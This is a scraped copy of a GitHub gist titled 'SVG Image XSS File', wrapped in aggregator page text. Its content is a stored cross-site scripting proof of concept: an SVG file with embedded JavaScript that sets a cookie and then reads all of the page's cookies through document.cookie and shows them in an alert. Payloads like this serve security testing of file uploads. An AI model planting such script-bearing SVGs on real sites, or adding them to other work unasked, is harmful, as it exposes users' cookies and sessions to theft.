SVG Image XSS File
source link: https://gist.github.com/rudSarkar/76f1ce7a65c356a5cd71d058ab76a344
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
SVG Image XSS File · GitHub
Instantly share code, notes, and snippets.
Save rudSarkar/76f1ce7a65c356a5cd71d058ab76a344 to your computer and use it in GitHub Desktop.
<title>Example of stored XSS with SVG file </title>
<script type="text/javascript"> // Function to set a cookie function setCookie(cookieName, cookieValue, expirationDays) { var date = new Date(); date.setTime(date.getTime() + (expirationDays * 24 * 60 * 60 * 1000)); var expires = 'expires=' + date.toUTCString(); document.cookie = cookieName + '=' + encodeURIComponent(cookieValue) + '; ' + expires + '; path=/'; }
// create a cookie for this page setCookie('username', 'JohnDoe', 7); // Sets a cookie named 'username' with value 'JohnDoe' that expires in 7 days </script> <script type="text/javascript"> // JavaScript code embedded in the SVG function getUserCookies() { // Read all cookies var allCookies = document.cookie; alert("Cookies found:" + allCookies) }
// call the function getUserCookies(); </script>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK